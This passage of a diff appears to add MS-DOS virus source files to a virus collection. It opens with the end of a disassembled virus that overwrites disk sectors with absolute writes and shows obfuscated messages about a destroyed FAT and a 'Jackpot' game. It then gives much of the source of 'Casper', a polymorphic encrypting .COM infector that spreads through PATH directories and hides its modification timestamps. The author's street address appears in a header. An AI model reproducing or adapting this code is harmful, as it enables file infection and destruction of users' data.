ds:data_16e,bx ; (6AE6:0045=0) + mov ds:data_17e,es ; (6AE6:0047=6AE6h) + mov dx,335h + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + retn +sub_5 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_6 proc near + mov dx,ds:data_16e ; (6AE6:0045=0) + mov cx,ds:data_17e ; (6AE6:0047=6AE6h) + push ds + push cx + pop ds + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop ds + retn +sub_6 endp + + db 50h, 53h, 51h, 52h, 1Eh, 6 + db 0B4h, 0, 0CDh, 13h, 0B4h, 1 + db 88h, 26h, 4Dh, 0, 0BFh, 0FFh + db 0FFh, 8Eh, 6, 49h, 0, 8Bh + db 1Eh, 4Bh, 0, 0B0h, 0, 26h + db 88h, 7, 7, 1Fh, 5Ah, 59h + db 5Bh, 58h, 0CFh, 8Ch, 0CAh, 0B9h + db 3Fh, 0, 3, 0D1h, 83h, 0C2h + db 10h, 8Eh, 0DAh, 0A1h, 3Dh, 0 + db 5, 3, 6, 0BBh, 0FEh, 0FFh + db 2Bh, 0D8h, 89h, 1Eh, 3, 6 + db 0BBh, 5, 6, 8Ah, 7, 2Eh + db 0A2h, 0, 1, 43h, 8Ah, 7 + db 2Eh, 0A2h, 1, 1, 43h, 8Ah + db 7, 2Eh, 0A2h, 2, 1, 43h + db 8Ah, 7, 2Eh, 0A2h, 3, 1 + db 0B4h, 2Ah, 0CDh, 21h, 80h, 0FAh + db 0Fh, 74h, 3, 0E9h, 0A2h, 1 +loc_23: + cmp dh,1 + je loc_24 ; Jump if equal + cmp dh,4 + je loc_24 ; Jump if equal + cmp dh,8 + je loc_24 ; Jump if equal + jmp loc_36 ; (0A33) +loc_24: + call sub_8 ; (09EB) + push ds + pop es + mov si,613h + mov di,613h + mov cx,305h + cld ; Clear direction + +locloop_25: + lodsb ; String [si] to al + sub al,64h ; 'd' + stosb ; Store al to es:[di] + loop locloop_25 ; Loop if cx > 0 + + mov dx,613h + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx +loc_26: + mov ah,7 + int 21h ; DOS Services ah=function 07h + ; get keybd char al, no echo + mov byte ptr ds:data_2e,64h ; (0000:060D=0) 'd' + nop + mov byte ptr ds:data_3e,78h ; (0000:060E=0) 'x' + nop + mov byte ptr ds:data_4e,0B4h ; (0000:060F=0) + nop + mov ah,2Ch ; ',' + int 21h ; DOS Services ah=function 2Ch + ; get time, cx=hrs/min, dh=sec + mov bl,dh + mov bh,0 + mov ch,0 + mov dh,0 + 
add cl,dl + mov ax,cx + mov cl,3 + div cl ; al, ah rem = ax/reg + mov ds:data_5e,ah ; (0000:0610=0) + mov ax,dx + mov dl,3 + div dl ; al, ah rem = ax/reg + mov ds:data_6e,ah ; (0000:0611=0) + mov ax,bx + div dl ; al, ah rem = ax/reg + mov ds:data_7e,ah ; (0000:0612=0) + dec byte ptr ds:data_1e ; (0000:060C=0) + mov al,ds:data_1e ; (0000:060C=0) + add al,30h ; '0' + mov dh,0Dh + mov dl,26h ; '&' + mov bx,0 + mov ah,2 + int 10h ; Video display ah=functn 02h + ; set cursor location in dx + mov ah,0Eh + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode +loc_27: + mov dx,1FFFh +loc_28: + nop + nop + nop + dec dx + jnz loc_28 ; Jump if not zero + mov al,ds:data_2e ; (0000:060D=0) + cmp al,ds:data_5e ; (0000:0610=0) + je loc_29 ; Jump if equal + mov dl,19h + mov al,ds:data_2e ; (0000:060D=0) + call sub_7 ; (09C9) + mov al,ds:data_2e ; (0000:060D=0) + dec al + mov ds:data_2e,al ; (0000:060D=0) +loc_29: + mov al,ds:data_3e ; (0000:060E=0) + cmp al,ds:data_6e ; (0000:0611=0) + je loc_30 ; Jump if equal + mov dl,21h ; '!' 
+ mov al,ds:data_3e ; (0000:060E=0) + call sub_7 ; (09C9) + dec byte ptr ds:data_3e ; (0000:060E=0) +loc_30: + mov al,ds:data_4e ; (0000:060F=0) + cmp al,ds:data_7e ; (0000:0612=0) + je loc_31 ; Jump if equal + mov dl,29h ; ')' + mov al,ds:data_4e ; (0000:060F=0) + call sub_7 ; (09C9) + dec byte ptr ds:data_4e ; (0000:060F=0) +loc_31: + mov al,ds:data_4e ; (0000:060F=0) + cmp al,ds:data_7e ; (0000:0612=0) + jne loc_27 ; Jump if not equal + mov ah,ds:data_3e ; (0000:060E=0) + cmp ah,ds:data_6e ; (0000:0611=0) + jne loc_27 ; Jump if not equal + mov bl,ds:data_2e ; (0000:060D=0) + cmp bl,ds:data_5e ; (0000:0610=0) + jne loc_27 ; Jump if not equal + cmp al,0 + jne loc_32 ; Jump if not equal + cmp ah,0 + jne loc_32 ; Jump if not equal + cmp bl,0 + jne loc_32 ; Jump if not equal + mov dx,80Ah + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + call sub_9 ; (0A18) + jmp short loc_35 ; (09C7) + db 90h +loc_32: + cmp al,1 + jne loc_33 ; Jump if not equal + cmp ah,1 + jne loc_33 ; Jump if not equal + cmp bl,1 + jne loc_33 ; Jump if not equal + mov dx,88Dh + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + jmp short loc_34 ; (09BD) + db 90h +loc_33: + mov al,ds:data_1e ; (0000:060C=0) + cmp al,0 + je loc_34 ; Jump if equal + jmp loc_26 ; (08BF) +loc_34: + mov dx,8D6h + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + jmp short loc_35 ; (09C7) + nop +loc_35: + jmp short loc_35 ; (09C7) + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_7 proc near + mov ah,0 + push ax + mov dh,0Bh + mov ah,2 + mov bh,0 + int 10h ; Video display ah=functn 02h + ; set cursor location in dx + pop ax + mov bl,3 + div bl ; al, ah rem = ax/reg + mov bl,ah + mov bh,0 + add bx,609h + mov al,[bx] + mov ah,0Eh + mov bx,0 + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode + retn +sub_7 endp + + 
+;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_8 proc near + push ds + mov bx,ds + add bx,1000h + mov ds,bx + mov bx,0 + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + mov cx,50h + mov dx,0 + int 25h ; Absolute disk read, drive al + popf ; Pop flags + mov bx,0 + mov ds,bx + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + mov cx,50h + mov dx,0 + int 26h ; Absolute disk write, drive al + popf ; Pop flags + pop ds + retn +sub_8 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_9 proc near + push ds + mov bx,ds + add bx,1000h + mov ds,bx + mov bx,0 + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + mov cx,50h + mov dx,0 + int 26h ; Absolute disk write, drive al + popf ; Pop flags + pop ds + retn +sub_9 endp + +loc_36: + mov bx,0 + mov ax,4B59h + int 21h ; DOS Services ah=function 4Bh + ; run progm @ds:dx, parm @es:bx + cmp ax,666h + jne loc_37 ; Jump if not equal + jmp loc_41 ; (0AF0) +loc_37: + push ds + pop es + push ds + push cs + pop ds + mov si,0 + mov di,917h + mov cx,100h + cld ; Clear direction + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + pop ds + mov ah,2Fh ; '/' + int 21h ; DOS Services ah=function 2Fh + ; get DTA ptr into es:bx + mov ds:data_14e,bx ; (6AE6:0041=0) + mov ds:data_15e,es ; (6AE6:0043=6AE6h) + mov dx,4Eh + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + mov dx,11h + mov cx,3Fh + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_38 ; Jump if carry Set + mov dx,11h + call sub_1 ; (06EE) + cmp dl,1 + jne loc_38 ; Jump if not equal + call sub_2 ; (073C) +loc_38: + call sub_5 ; (07FD) + mov dx,20h + mov cx,2 + mov ah,3Ch ; '<' + int 21h ; DOS Services ah=function 3Ch + ; create/truncate file @ ds:dx + jc loc_40 ; Jump if carry Set + mov bx,ax + 
mov dx,0 + mov cx,91Ah + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + push ax + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + pop ax + cmp ax,cx + je loc_39 ; Jump if equal + mov dx,20h + mov ah,41h ; 'A' + int 21h ; DOS Services ah=function 41h + ; delete file, name @ ds:dx + jmp short loc_40 ; (0AD1) + db 90h +loc_39: + push cs + pop es + mov bx,cs:data_8e ; (6AE6:0002=0) + sub bx,92Ch + mov cx,cs + sub bx,cx + mov ah,4Ah ; 'J' + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + mov dx,20h + push ds + pop es + mov bx,2Dh + mov ax,4B00h + int 21h ; DOS Services ah=function 4Bh + ; run progm @ds:dx, parm @es:bx +loc_40: + call sub_6 ; (0813) + push cs + pop es + mov di,0 + mov si,917h + mov cx,0FFh + cld ; Clear direction + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov dx,ds:data_14e ; (6AE6:0041=0) + mov bx,ds:data_15e ; (6AE6:0043=6AE6h) + mov ds,bx + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA to ds:dx +loc_41: + push cs + pop ds + jmp $-0F32h + jmp $+3DFh + db 48h, 9Bh, 9Ch, 3Fh, 5, 0Ah + db 5, 3, 1, 3, 0, 6Eh + db 71h, 6Dh, 6Dh, 84h, 84h, 84h + db 0A8h, 0ADh, 0B7h, 0AFh, 84h, 0A8h + db 0A9h, 0B7h, 0B8h, 0B6h, 0B3h, 0BDh + db 0A9h, 0B6h, 84h, 5Dh, 84h, 0A5h + db 84h, 0B7h, 0B3h, 0B9h, 0BAh, 0A9h + db 0B2h, 0ADh, 0B6h, 84h, 0B3h, 0AAh + db 84h, 0B1h, 0A5h, 0B0h, 0B8h, 0A5h + db 6Eh, 71h, 6Eh, 71h, 6Dh, 6Dh + db 0ADh, 84h, 0CCh, 0C5h, 0DAh, 0C9h + db 84h, 0CEh, 0D9h, 0D7h, 0D8h, 84h + db 0A8h, 0A9h, 0B7h, 0B8h, 0B6h, 0B3h + db 0BDh, 0A9h, 0A8h, 84h, 0D8h, 0CCh + db 0C9h, 84h, 0AAh, 0A5h, 0B8h, 84h + db 0D3h, 0D2h, 84h, 0DDh, 0D3h, 0D9h + db 0D6h, 84h, 0A8h, 0CDh, 0D7h, 0CFh + db 84h, 85h, 85h, 6Eh, 71h, 84h + db 84h, 84h, 84h, 84h, 84h, 0ACh + db 0D3h, 0DBh, 0C9h, 0DAh, 0C9h, 0D6h + db 90h, 84h, 0ADh, 84h, 0CCh, 0C5h + db 0DAh, 0C9h, 84h, 0C5h, 84h, 0C7h + db 0D3h, 0D4h, 0DDh, 84h, 0CDh, 0D2h + db 84h, 0B6h, 0A5h, 0B1h, 
90h, 84h + db 0C5h, 0D2h, 0C8h, 84h, 0ADh, 0C4h + db 0D1h, 84h, 0CBh, 0CDh, 0DAh, 0CDh + db 0D2h, 0CBh, 84h, 0DDh, 0D3h, 0D9h + db 84h, 0C5h, 84h, 0D0h, 0C5h, 0D7h + db 0D8h, 84h, 0C7h, 0CCh, 0C5h, 0D2h + db 0C7h, 0C9h, 6Eh, 71h, 6Dh, 6Dh + db 6Dh, 0D8h, 0D3h, 84h, 0D6h, 0C9h + db 0D7h, 0D8h, 0D3h, 0D6h, 0C9h, 84h + db 0DDh, 0D3h, 0D9h, 0D6h, 84h, 0D4h + db 0D6h, 0C9h, 0C7h, 0CDh, 0D3h, 0D9h + db 0D7h, 84h, 0C8h, 0C5h, 0D8h, 0C5h + db 92h, 6Eh, 71h, 84h, 84h, 84h + db 84h, 84h, 0BBh, 0A5h, 0B6h, 0B2h + db 0ADh, 0B2h, 0ABh, 9Eh, 84h, 0ADh + db 0AAh, 84h, 0BDh, 0B3h, 0B9h, 84h + db 0B6h, 0A9h, 0B7h, 0A9h, 0B8h, 84h + db 0B2h, 0B3h, 0BBh, 90h, 84h, 0A5h + db 0B0h, 0B0h, 84h, 0BDh, 0B3h, 0B9h + db 0B6h, 84h, 0A8h, 0A5h, 0B8h, 0A5h + db 84h, 0BBh, 0ADh, 0B0h, 0B0h, 84h + db 0A6h, 0A9h, 84h, 0B0h, 0B3h, 0B7h + db 0B8h, 84h, 91h, 84h, 0AAh, 0B3h + db 0B6h, 0A9h, 0BAh, 0A9h, 0B6h, 84h + db 85h, 85h, 6Eh, 71h, 6Dh, 6Dh + db 84h, 84h, 84h, 0BDh, 0D3h, 0D9h + db 0D6h, 84h, 0A8h, 0C5h, 0D8h, 0C5h + db 84h, 0C8h, 0C9h, 0D4h, 0C9h, 0D2h + db 0C8h, 0D7h, 84h, 0D3h, 0D2h, 84h + db 0C5h, 84h, 0CBh, 0C5h, 0D1h, 0C9h + db 84h, 0D3h, 0CAh, 84h, 0AEh, 0A5h + db 0A7h, 0AFh, 0B4h, 0B3h, 0B8h, 71h + db 6Eh, 71h, 6Eh, 6Dh, 6Dh, 84h + db 84h, 84h, 84h, 84h, 84h, 0A7h + db 0A5h, 0B7h, 0ADh, 0B2h, 0B3h, 84h + db 0A8h, 0A9h, 84h, 0B1h, 0A5h, 0B0h + db 0B8h, 0A9h, 84h, 0AEh, 0A5h, 0A7h + db 0AFh, 0B4h, 0B3h, 0B8h + db 'nqnqmmm-1' + db 1Fh, 6Dh, 2Dh, 31h, 1Fh, 6Dh + db 2Dh, 31h, 1Fh, 6Eh, 71h, 6Dh + db 6Dh, 6Dh, 3Bh, 0, 3Bh, 6Dh + db 3Bh, 0A3h, 3Bh, 6Dh, 3Bh, 0FFh + db ';nqmmm,1 m,1 m,1 nqmmm' + db 84h, 84h, 84h, 84h, 0A7h, 0B6h + db 0A9h, 0A8h, 0ADh, 0B8h, 0B7h, 84h + db 9Eh, 84h, 99h + db 'nqqnqnmmm' + db 0, 0, 0, 84h, 0A1h, 84h + db 0BDh, 0D3h, 0D9h, 0D6h, 84h, 0A8h + db 0CDh, 0D7h, 0CFh, 6Eh, 71h, 6Dh + db 6Dh, 6Dh, 0A3h, 0A3h, 0A3h, 84h + db 0A1h, 84h, 0B1h, 0DDh, 84h, 0B4h + db 0CCh, 0D3h, 0D2h, 0C9h, 84h, 0B2h + db 0D3h, 92h, 6Eh, 71h, 6Eh, 71h + db 6Dh, 6Dh, 6Dh, 0A5h, 0B2h, 0BDh + db 
84h, 0AFh, 0A9h, 0BDh, 84h, 0B8h + db 0B3h, 84h, 0B4h, 0B0h, 0A5h, 0BDh + db 'qnqnqnqnqn' + db 88h, 6Eh, 71h, 0A6h, 0A5h, 0B7h + db 0B8h, 0A5h, 0B6h, 0A8h, 84h, 85h + db 84h, 0BDh, 0D3h, 0D9h, 0C4h, 0D6h + db 0C9h, 84h, 0D0h, 0D9h, 0C7h, 0CFh + db 0DDh, 84h, 0D8h, 0CCh, 0CDh, 0D7h + db 84h, 0D8h, 0CDh, 0D1h, 0C9h, 84h + db 91h, 84h, 0C6h, 0D9h, 0D8h, 84h + db 0CAh, 0D3h, 0D6h, 84h, 0DDh, 0D3h + db 0D9h, 0D6h, 84h, 0D3h, 0DBh, 0D2h + db 84h, 0D7h, 0C5h, 0CFh, 0C9h, 90h + db 84h, 0D2h, 0D3h, 0DBh, 6Eh, 71h + db 0B7h, 0BBh, 0ADh, 0B8h, 0A7h, 0ACh + db 84h, 0B3h, 0AAh, 0AAh, 84h, 0BDh + db 0B3h, 0B9h, 0B6h, 84h, 0A7h, 0B3h + db 0B1h, 0B4h, 0B9h, 0B8h, 0A9h, 0B6h + db 84h, 0A5h, 0B2h, 0A8h, 84h, 0A8h + db 0B3h, 0B2h, 0C4h, 0B8h, 84h, 0B8h + db 0B9h, 0B6h +loc_42: + mov dl,84h + lodsw ; String [si] to ax + mov ax,0B384h + mov dl,84h + mov ax,0B0ADh + mov al,84h + mov ax,0B1B3h + mov bl,0B6h + mov dh,0B3h + mov bx,8584h + test ax,ds:data_33e[di] ; (6AE6:716E=0) + mov [bp+71h],ch + mov dl,0D3h + test ch,[bp+si-3827h] + iret ; Interrupt return + db 0CDh, 0D2h, 0C4h, 84h, 0A7h, 0CCh + db 0C5h, 0D2h, 0C7h, 0C9h, 9Fh, 84h + db 0C5h, 0D2h, 0C8h, 84h, 0ADh, 0C4h + db 0D1h, 84h, 0D4h, 0D9h, 0D2h, 0CDh + db 0D7h, 0CCh, 0CDh, 0D2h, 0CBh, 84h + db 0DDh, 0D3h, 0D9h, 84h, 0CAh, 0D3h + db 0D6h, 84h, 0D8h, 0D6h, 0DDh, 0CDh + db 0D2h, 0CBh, 84h, 0D8h, 0D3h, 84h + db 0D8h, 0D6h, 0C5h, 0C7h, 0C9h, 84h + db 0D1h, 0C9h, 84h, 0C8h, 0D3h, 0DBh + db 0D2h, 84h, 85h, 88h, 6Eh, 71h + db 0ACh, 0A5h, 84h, 0ACh, 0A5h, 84h + db 85h, 85h, 84h, 0BDh, 0D3h, 0D9h + db 84h, 0C5h, 0D7h, 0D7h, 0CCh, 0D3h + db 0D0h, 0C9h, 90h, 84h, 0DDh, 0D3h + db 0D9h, 0C4h, 0DAh, 0C9h, 84h, 0D0h + db 0D3h, 0D7h, 0D8h, 9Eh, 84h, 0D7h + db 0C5h, 0DDh, 84h, 0A6h, 0DDh, 0C9h + db 84h, 0D8h, 0D3h, 84h, 0DDh, 0D3h + db 0D9h, 0D6h, 84h, 0A6h, 0C5h, 0D0h + db 0D0h, 0D7h, 84h, 92h, 92h, 92h + db 6Eh, 71h, 88h, 0CDh, 20h, 0 + +seg_a ends + + + + end start 
diff --git a/MSDOS/Virus.MSDOS.Unknown.casper.asm b/MSDOS/Virus.MSDOS.Unknown.casper.asm
new file mode 100644
index 00000000..e157a0b1
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.casper.asm
@@ -0,0 +1,776 @@ +; +; +; Copyright (C) Mark Washburn, 1990. All Rights Reserved +; +; +; Inquires are directed to : +; Mark Washburn +; 4656 Polk Street NE +; Columbia Heights, MN 55421 +; USA +; +; +; +; +code segment public 'CODE' + org 100h +; + assume cs:code,ds:code,es:code +; + +;stopdebug equ 1 ; define this for disassembly trap code +int1vec equ 4 +int3vec equ 12 +; +dta_ptr equ -4 +file_crea equ -8 +file_attr equ -10 +path_start_ptr equ -12 +file_start_ptr equ -14 +RAND_SEED equ -16 +ptr1 equ -18 ; pointer to start of loop code +ptr2 equ -20 ; save data_begin pointer +dat1 equ -22 ; the random code used +dat2 equ -24 ; the decode length plus random length offset, max_msk + ; to make the decode routine more difficult to detect +dat3 equ -26 ; the 'necessary crypt code' mask +; +IFNDEF stopdebug +local_stack equ 26 +max_msk equ 0ffh ; this determines the maximum variance of length +ELSE +nobugptr equ -28 +oldint3 equ -32 +oldint1 equ -36 +local_stack equ 36 +max_msk equ 0ffh ; this determines the maximum variance of length +ENDIF +; +; +; +doscall macro call_type + ifnb + mov ah, call_type + endif + int 21h + endm +; +setloc macro arg1,reg2 + mov [bp + arg1],reg2 + endm +; +getloc macro reg1,arg2 + mov reg1,[bp + arg2] + endm +; +setdat macro arg1,reg2 + mov [si + offset arg1 - offset data_begin],reg2 + endm +; +getdat macro reg1,arg2 + mov reg1,[si + offset arg2 - offset data_begin] + endm +; +regofs macro reg1,arg2 + mov reg1,si + add reg1,offset (arg2 - data_begin) + endm +; +NOBUG1 macro +IFDEF stopdebug + INT 3 + NOP +ENDIF + endm +; +nobug2 macro +IFDEF stopdebug + INT 3 +ENDIF + endm +; +; +start: + jmp entry +; +; +; + MOV AH,0 + INT 021h ; program code +; db 600h-6 dup (0) +; insert utility code here +; +entry: + + +IFDEF stopdebug + call precrypt + db 36 dup (090h) ; calculated length of offset(t41-t10) +ELSE + db 39 dup (090h) ; calculated length of offset(t41-t10) +ENDIF +; +; label the start of encoded section +entry2: + + + + + + +INCLUDE 
utility.asm <------- Manipulation Task Goes Here! + + + + + + + + mov bp,sp ; allocate locals + sub sp,local_stack +; + push cx +movcmd: ; this label is used to locate the next instruction + mov dx,offset data_begin + setloc ptr2,dx ; save - will be modified in 'gencode' +IFDEF stopdebug +; +; save interrupt 1 and 3 vectors +; + push ds + mov ax,0 + push ax + pop ds + cli + mov ax,ds:[int1vec] + setloc oldint1,ax + mov ax,ds:[int1vec+2] + setloc oldint1+2,ax + mov ax,ds:[int3vec] + setloc oldint3,ax + mov ax,ds:[int3vec+2] + setloc oldint3+2,ax + sti + pop ds +; + call bugon +ENDIF + mov si,dx + add si,(offset old_code - offset data_begin) + mov di,0100h + mov cx,03h + cld + repz movsb + mov si,dx + doscall 30h ; check DOS version + cmp al,0 + NOBUG1 ; 0 + jnz cont1 ; DOS > 2.0 + jmp exit +cont1: + push es + doscall 2fh ; get program DTA + NOBUG1 ; 0 + setloc dta_ptr,bx + NOBUG1 ; 0 + setloc dta_ptr+2,es + pop es + regofs dx,my_dta + doscall 1ah ; set new DTA + push es + push si + mov es,ds:[02ch] ; environment address + mov di,0 +loop1: + pop si + push si + add si,(offset path_chars - offset data_begin) + lodsb + mov cx,8000h + repnz scasb + mov cx,4 +loop2: + lodsb + scasb + jnz loop1 + loop loop2 + pop si + pop es + setloc path_start_ptr,di + mov bx,si + add si,offset (file_name-data_begin) + mov di,si + jmp cont6 + nobug2 +next_path: + cmp word ptr [bp + path_start_ptr],0 + jnz cont3 + jmp exit2 + nobug2 +cont3: + push ds + push si + mov ds,es:[002ch] + + mov di,si + mov si,es:[bp+path_start_ptr] + add di,offset (file_name-data_begin) +loop3: + lodsb + cmp al,';' ; 3bh + jz cont4 + cmp al,0 + jz cont5 + stosb + jmp loop3 + nobug2 +cont5: + mov si,0 +cont4: + pop bx + pop ds + mov [bp+path_start_ptr],si + cmp ch,0ffh + jz cont6 + mov al,'\' ; 5ch + stosb +cont6: + mov [bp+file_start_ptr],di + mov si,bx + add si,(offset com_search-offset data_begin) + mov cx,6 + repz movsb + mov si,bx + mov ah,04eh + regofs dx,file_name + mov cx,3 + doscall + jmp cont7 + nobug2 
+next_file: + doscall 04fh +cont7: + jnb cont8 + jmp next_path + nobug2 +cont8: + mov ax,[si+offset(my_dta-data_begin)+016h] ; low time byte + and al,01fh + cmp al,01fh + jz next_file +IFNDEF stopdebug + cmp word ptr [si+offset(my_dta-data_begin)+01ah],0fa00h + ; file length compared; need 1.5 k spare, see rnd off +ELSE + cmp word ptr [si+offset(my_dta-data_begin)+01ah],0f800h +ENDIF + jz next_file ; with virus length + cmp word ptr [si+offset(my_dta-data_begin)+01ah],0ah + ; file to short + jz next_file + mov di,[bp+file_start_ptr] + push si + add si,offset(my_dta-data_begin+01eh) +move_name: + lodsb + stosb + cmp al,0 + jnz move_name + pop si + mov ax,04300h + regofs dx,file_name + doscall + setloc file_attr,cx + mov ax,04301h + and cx,0fffeh + regofs dx,file_name + doscall + mov ax,03d02h + regofs dx,file_name + doscall + jnb cont9 + jmp exit3 + nobug2 +cont9: + mov bx,ax + mov ax,05700h + doscall + setloc file_crea,cx + setloc file_crea+2,dx +cont10: + mov ah,3fh + mov cx,3 + regofs dx,old_code + doscall + NOBUG1 ; 1 + jb cont98 + NOBUG1 + cmp ax,3 + NOBUG1 + jnz cont98 + NOBUG1 + mov ax,04202h + NOBUG1 ;1 + mov cx,0 + mov dx,0 + doscall + jnb cont99 +cont98: + jmp exit4 +cont99: + NOBUG1 ; 2 + push bx ; save file handle + NOBUG1 + mov cx,ax + push cx + NOBUG1 + sub ax,3 + NOBUG1 + setdat jump_code+1,ax + add cx,(offset data_begin-offset entry+0100h) + NOBUG1 + mov di,si + NOBUG1 + sub di,offset data_begin-offset movcmd-1 + NOBUG1 + mov [di],cx +; + doscall 02ch ; seed the random number generator + xor dx,cx + NOBUG1 + setloc rand_seed,dx + NOBUG1 ; 2 + call random + NOBUG1 ; 3 + getloc ax,rand_seed + NOBUG1 ; 3 + and ax,max_msk ; add a random offset to actual length + NOBUG1 ; 3 + add ax,offset (data_end-entry2) ; set decode length + NOBUG1 ; 3 + setloc dat2,ax ; save the decode length + NOBUG1 ; 3 + setdat (t13+1),ax ; set decode length in 'mov cx,xxxx' + pop cx ; restore the code length of file to be infected + NOBUG1 ; 3 + add cx,offset (entry2-entry+0100h) 
; add the length + ; of uncoded area plus file offset + setdat (t11+1),cx ; set decode begin in 'mov di,xxxx' + NOBUG1 ; 3 + call random + getloc ax,rand_seed + NOBUG1 ; 3 + setloc dat1,ax ; save this random key in dat1 + setdat (t12+1),ax ; set random key in 'mov ax,xxxx' + NOBUG1 ; 3 + mov di,si + NOBUG1 ; 3 + sub di,offset (data_begin-entry) + NOBUG1 ; 3 + mov bx,si + add bx,offset (l11-data_begin) ; table L11 address + mov word ptr [bp+dat3],000000111b ; required routines + call gen2 ; generate first part of decrypt + setloc ptr1,di ; save the current counter to resolve 'loop' + add bx,offset (l21-l11) ; add then next tables' offset + NOBUG1 ; 3 + mov word ptr [bp+dat3],010000011b ; required plus 'nop' + NOBUG1 ; 3 + call gen2 ; generate second part of decrypt + add bx,offset (l31-l21) ; add the next offset + NOBUG1 + call gen2 ; generate third part of decrypt + mov cx,2 ; store the loop code + getloc si,ptr2 + NOBUG1 ; 3 + add si,offset (t40-t10) ; point to the code + repz movsb ; move the code + getloc ax,ptr1 ; the loop address pointer + sub ax,di ; the current address + dec di ; point to the jump address + stosb ; resolve the jump +; fill in the remaining code +l991: + getloc cx,ptr2 ; get the data_begin pointer + sub cx,offset (data_begin-entry2) ; locate last+1 entry + cmp cx,di ; are we there yet? 
+ je l992 ; if not then fill some more space + mov dx,0h ; any code is ok + call gencode ; generate the code + jmp l991 + nobug2 +l992: + getloc si,ptr2 ; restore si to point to data area ; + push si + mov di,si + NOBUG1 ; 4 + mov cx,offset(end1-begin1) ; move code + add si,offset(begin1-data_begin) + NOBUG1 ; 4 + add di,offset(data_end-data_begin+max_msk) ; add max_msk + mov dx,di ; set subroutine start + repz movsb ; move the code + pop si + pop bx ; restore handle + call setrtn ; find this address + add ax,06h ; <- the number necessary for proper return + push ax + jmp dx ; continue with mask & write code +; continue here after return from mask & write code + NOBUG1 ; 4 + jb exit4 + cmp ax,offset(data_end-entry) + NOBUG1 ; 4 + jnz exit4 + mov ax,04200h + mov cx,0 + mov dx,0 + doscall + jb exit4 + mov ah,040h + mov cx,3 + NOBUG1 ; 4 + regofs dx,jump_code + doscall +exit4: + getloc dx,file_crea+2 + getloc cx,file_crea + and cx,0ffe0h + or cx,0001fh + mov ax,05701h + doscall + doscall 03Eh ; close file +exit3: + mov ax,04301h + getloc cx,file_attr + regofs dx,file_name + doscall +exit2: + push ds + getloc dx,dta_ptr + getloc ds,dta_ptr+2 + doscall 01ah + pop ds +exit: + pop cx + xor ax,ax + xor bx,bx + xor dx,dx + xor si,si + mov sp,bp ; deallocate locals + mov di,0100h + push di +IFDEF stopdebug + call bugoff +ENDIF + ret +; +; common subroutines +; +; +random proc near +; + getloc cx,rand_seed ; get the seed + xor cx,813Ch ; xor random pattern + add cx,9248h ; add random pattern + ror cx,1 ; rotate + ror cx,1 ; three + ror cx,1 ; times. + setloc rand_seed,cx ; put it back + and cx,7 ; ONLY NEED LOWER 3 BITS + push cx + inc cx + xor ax,ax + stc + rcl ax,cl + pop cx + ret ; return +; +random endp +; +setrtn proc near +; + pop ax ; ret near + push ax + ret +; +setrtn endp +; +gencode proc near +; +l999: + call random + test dx,ax ; has this code been used yet? 
+ jnz l999 ; if this code was generated - try again + or dx,ax ; set the code as used in dx + mov ax,cx ; the look-up index + sal ax,1 + push ax + xlat + mov cx,ax ; the count of instructions + pop ax + inc ax + xlat + add ax,[bp+ptr2] ; ax = address of code to be moved + mov si,ax + repz movsb ; move the code into place + ret +; +gencode endp +; +gen2 proc near +; + mov dx,0h ; used code +l990: + call gencode + mov ax,dx ; do we need more code + and ax,[bp+dat3] ; the mask for the required code + cmp ax,[bp+dat3] + jne l990 ; if still need required code - loop again + ret +; +gen2 endp +; +IFDEF stopdebug +doint3: + push bx + mov bx,sp + push ax + push si + mov si,word ptr [bx+02] + inc word ptr [bx+02] ; point to next address + setloc nobugptr,si + lodsb ; get the byte following int 3 + xor byte ptr [si],al + mov al,[bx+7] ; set the trap flag + or al,1 + mov [bx+7],al + pop si + pop ax + pop bx + iret +; +doint1: + push bx + mov bx,sp + push ax + push si + getloc si,nobugptr + lodsb + xor byte ptr [si],al + mov 